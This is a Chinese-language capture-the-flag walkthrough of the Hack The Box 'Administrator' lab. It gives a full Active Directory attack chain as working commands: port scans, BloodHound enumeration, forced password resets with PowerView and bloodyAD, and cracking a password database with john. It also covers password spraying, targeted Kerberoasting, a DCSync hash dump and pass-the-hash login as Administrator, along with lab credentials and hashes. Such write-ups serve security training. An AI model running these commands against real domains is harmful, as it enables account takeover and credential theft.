目录
连接至HTB服务器并启动靶机
信息收集
使用rustscan对靶机TCP端口进行开放扫描
将靶机TCP开放端口号提取并保存
使用nmap对靶机TCP开放端口进行脚本、服务扫描
使用nmap对靶机TCP开放端口进行漏洞、系统扫描
使用nmap对靶机常用UDP端口进行开放扫描
使用nmap对靶机UDP开放端口进行脚本、服务扫描
横向移动A
使用netexec内置的bloodhound模块收集靶机域内信息
编辑
将数据文件上传至bloodhound分析
查看当前控制用户的可传递控制对象
为olivia用户创建凭证对象
使用Set-DomainUserPassword通过olivia用户凭证对象修改michael用户密码
使用bloodyAD通过michael凭证修改benjamin用户密码
使用ftp通过上述凭证登录靶机FTP服务器
使用pwsafe2john将该文件转换为哈希格式
使用john对该哈希文件进行字典爆破
使用Password Safe通过上述密码打开该数据库文件
使用netexec收集靶机域内用户名单
使用netexec通过上述名单和密码进行密码喷洒
横向移动B
使用BloodHound查看至域管理员最短路径
使用bloodyAD将ethan用户的SPN属性修改为服务账户格式
使用impacket-GetUserSPNs获取ethan用户的ST票据
使用john通过字典爆破该TGS票据
权限提升
使用netexec通过凭证测试能否登录靶机Win-RM服务
使用BloodHound查看ethan用户一级控制对象
使用impacket-secretsdump通过DCSync权限转储域内用户密码哈希
使用impacket-psexec通过administrator哈希密码直接登录靶机
连接至HTB服务器并启动靶机
分配IP:10.10.16.22
靶机IP:10.10.11.42
靶机AD:administrator.htb
靶机DC:dc.administrator.htb
- 已有凭证
账户:Olivia
密码:ichliebedich
信息收集
使用rustscan对靶机TCP端口进行开放扫描
rustscan -a administrator.htb -r 1-65535 --ulimit 5000 | tee res
将靶机TCP开放端口号提取并保存
ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# grep ^[0-9] res | cut -d/ -f1 | paste -sd,
21,53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49668,62491,63695,63700,63711,63722,63758
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo $ports
21,53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49668,62491,63695,63700,63711,63722,63758
使用nmap对靶机TCP开放端口进行脚本、服务扫描
nmap -sT -p$ports -sCV -Pn administrator.htb
- 需要重点关注的端口和服务
21端口:FTP服务
53端口:Domain服务
88端口:Kerberos服务
389端口:LDAP服务
445端口:SMB服务
5985端口:Win-RM服务
使用nmap对靶机TCP开放端口进行漏洞、系统扫描
nmap -sT -p$ports --script=vuln -O -Pn administrator.htb使用nmap对靶机常用UDP端口进行开放扫描
nmap -sU --top-ports 20 -Pn administrator.htb
使用nmap对靶机UDP开放端口进行脚本、服务扫描
nmap -sU -p53,123 -sCV -Pn administrator.htb
横向移动A
使用netexec内置的bloodhound模块收集靶机域内信息
netexec ldap administrator.htb -u 'Olivia' -p 'ichliebedich' --bloodhound -c All --dns-server 10.10.11.42
将数据文件上传至bloodhound分析
查看当前控制用户的可传递控制对象
- 由图表显示可见,OLIVIA用户可完全控制MICHAEL用户,而MICHAEL用户可修改BENJAMIN用户密码。将该图表中所有图标设置为已控制
为olivia用户创建凭证对象
- 上传PowerView.ps1脚本文件
upload PowerView.ps1*Evil-WinRM* PS C:\Users\olivia\Desktop> upload PowerView.ps1
Info: Uploading /home/kali/Desktop/temp/PowerView.ps1 to C:\Users\olivia\Desktop\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
- 加载导入该脚本文件
. .\PowerView.ps1- 创建凭证对象
$SecPassword = ConvertTo-SecureString 'ichliebedich' -AsPlainText -Force$Cred = New-Object System.Management.Automation.PSCredential('administrator\olivia', $SecPassword)使用Set-DomainUserPassword通过olivia用户凭证对象修改michael用户密码
- 创建安全密码对象
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force- 通过安全密码对象修改michael用户密码
Set-DomainUserPassword -Identity michael -AccountPassword $UserPassword -Credential $Cred使用bloodyAD通过michael凭证修改benjamin用户密码
bloodyAD -d 'administrator.htb' -u 'michael' -p 'Password123!' --host '10.10.11.42' set password 'benjamin' 'Password123!'┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# bloodyAD -d 'administrator.htb' -u 'michael' -p 'Password123!' --host '10.10.11.42' set password 'benjamin' 'Password123!'
[+] Password changed successfully!
使用ftp通过上述凭证登录靶机FTP服务器
ftp administrator.htb- 将Backup.psafe3文件下载到攻击机本地
使用pwsafe2john将该文件转换为哈希格式
pwsafe2john Backup.psafe3 | tee hash┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# pwsafe2john Backup.psafe3 | tee hash
Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050
使用john对该哈希文件进行字典爆破
john hash --wordlist=../dictionary/rockyou.txt
使用Password Safe通过上述密码打开该数据库文件
- 将密码逐个复制出来
alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur
使用netexec收集靶机域内用户名单
netexec ldap administrator.htb -u 'benjamin' -p 'Password123!' --users | grep -A20 Username | tail -n+2 | awk '{print $5}' | tee names.txt
- 将上述三条密码写入文件中以便使用
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat << EOF > passwds.txt
heredoc> UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
heredoc> UXLCI5iETUsIBoFVTj8yQFKoHjXmb
heredoc> WwANQWnmJnGV07WQN8bMS7FMAbjNur
heredoc> EOF
使用netexec通过上述名单和密码进行密码喷洒
netexec ldap administrator.htb -u names.txt -p passwds.txt --continue-on-success
- 在BloodHound中将emily用户标记为已控制
账户:emily
密码:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
- 在C:\Users\emily\Desktop目录下找到user.txt文件
横向移动B
使用BloodHound查看至域管理员最短路径
- 由图表可见,当前emily用户对ethan用户具有GenericWrite权限
使用bloodyAD将ethan用户的SPN属性修改为服务账户格式
bloodyAD -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' --host '10.10.11.42' set object ethan servicePrincipalName -v 'x0da6h/x0da6h'┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# bloodyAD -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' --host '10.10.11.42' set object ethan servicePrincipalName -v 'x0da6h/x0da6h'
[+] ethan's servicePrincipalName has been updated
使用impacket-GetUserSPNs获取ethan用户的ST票据
impacket-GetUserSPNs 'administrator.htb/emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb' -request
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$5f49ef0be2b6972a92c82e1234963f8f$81f519aed5a1067bf4a440646a632ba76c13547f441269e61baeaa1a4a45a279bd657ff9dee2833b038646f5331e9d91e25d01ca5942193e710e42b448469dde617df9670cf675d14583976933bfe8930c399eb10139d48eb1d796032f5fe7faddd046f24c54fc39b930cd7a0950c69cfe08671541b92722b74fbee710c5dcbb076283f61bde7c2a1e86a319961427728ef398ad1b86270aaf17c0e19430d0660d216aa1c599a82531ea00542f880abb85e7a381ab705f1b32919ab294f3d7783ba99e1622662ba8cf0c39b0dcfd5dfbd8558cf15ecdb849a0d5035054eed8515aff22f24c0a0444e2455f1e69936176a5d07aebc20378ee6a93a150af8544106b9678112ee588fc9318041c40f8a32eacc447766bf4349f3af6babc27a91788a1f6b08351f77204214e0eb29af694ebb5951bee9bdf99db9d07caeedd12ffb87e987550807ff2b7291575b90d18c99381f0eee79b80a51a3cee151a2367b49cb9a0ecf667c9cfe93c6b8effa053a0a04fba42c8af94482f437b424be2ea0cc5a7964a2f74e648f50d5fed91d38b4759c2704097b50b84774a2235acea898b1208fe22f761f0aff586f79caec60f00577b3f6831122569d23a99102705d4fe6bee7709a5d066cf4ae08648b70753bb860634f1e373fc957dbc7075c5e0902604cfe8f15fad35d99a3b4bb3e00d56e21d6847601e8a7c6b8a21eefe094b6901cd300f5ec63039b189b254d0bb40ea7ace243c31e73b767c654f26ebeefbff9739125babdfb42444dd30f79b7a7863ea0a121be40bf79cd0aee25e39177c57e920c87974c8444d3386b3440a7135bc25f1ecdd515f320455a29f23e16f66145cad7a10d951a1881d75199d203605cb4f13fac9059732cde7ced8c21fdc1e3becc489262ffdb27e19cb1a3c44e083c8a608875f96a9be319f863e3c43bbfb035b3ea077851b962c05c43cd903371a27466edf39a24c8504b792c146ccd9412d11e8597a1d188cd4e57d11a3524872ab2a9ce28eab637af7993b240ccf90375d4e93d498f5bd69f7118e2fb3f572d3457bfcdd9fddf8b9ab2783064f0480aca39884e156905f0a1d244e87a238a21081e1ff7d33159a0e1bbca2002b4603938d872c665112110d2abe8d22e7f1fd8571720cc19ff43b1fc466fd1427835cb38fe408b454b708a2883f027a2bd6abef4534296f23af5a2c59f340df2e9e2c19742a6d84d591739ef88bddb26192a125a3fb6abe22bf2c929aaab6faa7abff3cb7680818b25d314ae7ae6b22c97913d4b3c5c4861b9a9394bdd17aeb9ac76ca34e46e3401841cad6683ddd7b0435c8a17dac610e37ed82d6b03c75b280465dae5ca72abf10647ad3ee8c93d2a4aeee7e71e1e84562befdd270f0c7f1dc3d46607dc12760abaf120fe38a98617df6a69fc2b59279b7dc66e3454c8d5ecb6151f6d147fe1ed46f2deeb4cd329a5dfe164223d36770e4f9f8dbcc58c924b79d1a466d733e3b73cfd3e5eae40be05ec39345fac361edddea45781c498bdc3b8dc9f78144- 将该哈希值存入文件以便爆破
echo '$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$5f49ef0be2b6972a92c82e1234963f8f$81f519aed5a1067bf4a440646a632ba76c13547f441269e61baeaa1a4a45a279bd657ff9dee2833b038646f5331e9d91e25d01ca5942193e710e42b448469dde617df9670cf675d14583976933bfe8930c399eb10139d48eb1d796032f5fe7faddd046f24c54fc39b930cd7a0950c69cfe08671541b92722b74fbee710c5dcbb076283f61bde7c2a1e86a319961427728ef398ad1b86270aaf17c0e19430d0660d216aa1c599a82531ea00542f880abb85e7a381ab705f1b32919ab294f3d7783ba99e1622662ba8cf0c39b0dcfd5dfbd8558cf15ecdb849a0d5035054eed8515aff22f24c0a0444e2455f1e69936176a5d07aebc20378ee6a93a150af8544106b9678112ee588fc9318041c40f8a32eacc447766bf4349f3af6babc27a91788a1f6b08351f77204214e0eb29af694ebb5951bee9bdf99db9d07caeedd12ffb87e987550807ff2b7291575b90d18c99381f0eee79b80a51a3cee151a2367b49cb9a0ecf667c9cfe93c6b8effa053a0a04fba42c8af94482f437b424be2ea0cc5a7964a2f74e648f50d5fed91d38b4759c2704097b50b84774a2235acea898b1208fe22f761f0aff586f79caec60f00577b3f6831122569d23a99102705d4fe6bee7709a5d066cf4ae08648b70753bb860634f1e373fc957dbc7075c5e0902604cfe8f15fad35d99a3b4bb3e00d56e21d6847601e8a7c6b8a21eefe094b6901cd300f5ec63039b189b254d0bb40ea7ace243c31e73b767c654f26ebeefbff9739125babdfb42444dd30f79b7a7863ea0a121be40bf79cd0aee25e39177c57e920c87974c8444d3386b3440a7135bc25f1ecdd515f320455a29f23e16f66145cad7a10d951a1881d75199d203605cb4f13fac9059732cde7ced8c21fdc1e3becc489262ffdb27e19cb1a3c44e083c8a608875f96a9be319f863e3c43bbfb035b3ea077851b962c05c43cd903371a27466edf39a24c8504b792c146ccd9412d11e8597a1d188cd4e57d11a3524872ab2a9ce28eab637af7993b240ccf90375d4e93d498f5bd69f7118e2fb3f572d3457bfcdd9fddf8b9ab2783064f0480aca39884e156905f0a1d244e87a238a21081e1ff7d33159a0e1bbca2002b4603938d872c665112110d2abe8d22e7f1fd8571720cc19ff43b1fc466fd1427835cb38fe408b454b708a2883f027a2bd6abef4534296f23af5a2c59f340df2e9e2c19742a6d84d591739ef88bddb26192a125a3fb6abe22bf2c929aaab6faa7abff3cb7680818b25d314ae7ae6b22c97913d4b3c5c4861b9a9394bdd17aeb9ac76ca34e46e3401841cad6683ddd7b0435c8a17dac610e37ed82d6b03c75b280465dae5ca72abf10647ad3ee8c93d2a4aeee7e71e1e84562befdd270f0c7f1dc3d46607dc12760abaf120fe38a98617df6a69fc2b59279b7dc66e3454c8d5ecb6151f6d147fe1ed46f2deeb4cd329a5dfe164223d36770e4f9f8dbcc58c924b79d1a466d733e3b73cfd3e5eae40be05ec39345fac361edddea45781c498bdc3b8dc9f78144' > hash使用john通过字典爆破该TGS票据
john hash --wordlist=../dictionary/rockyou.txt --format=krb5tgs
账户:ethan
密码:limpbizkit
- 在BloodHound中将ethan用户标记为已控制
权限提升
使用netexec通过凭证测试能否登录靶机Win-RM服务
netexec winrm administrator.htb -u ethan -p 'limpbizkit'
- 可见ethan用户无法登录Win-RM
使用BloodHound查看ethan用户一级控制对象
- 再次查看至域管理员最短路径
使用impacket-secretsdump通过DCSync权限转储域内用户密码哈希
impacket-secretsdump 'administrator.htb/ethan:limpbizkit@10.10.11.42'
使用impacket-psexec通过administrator哈希密码直接登录靶机
impacket-psexec administrator.htb/administrator@10.10.11.42 -hashes aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e
- 在C:\Users\Administrator\Desktop目录下找到root.txt文件
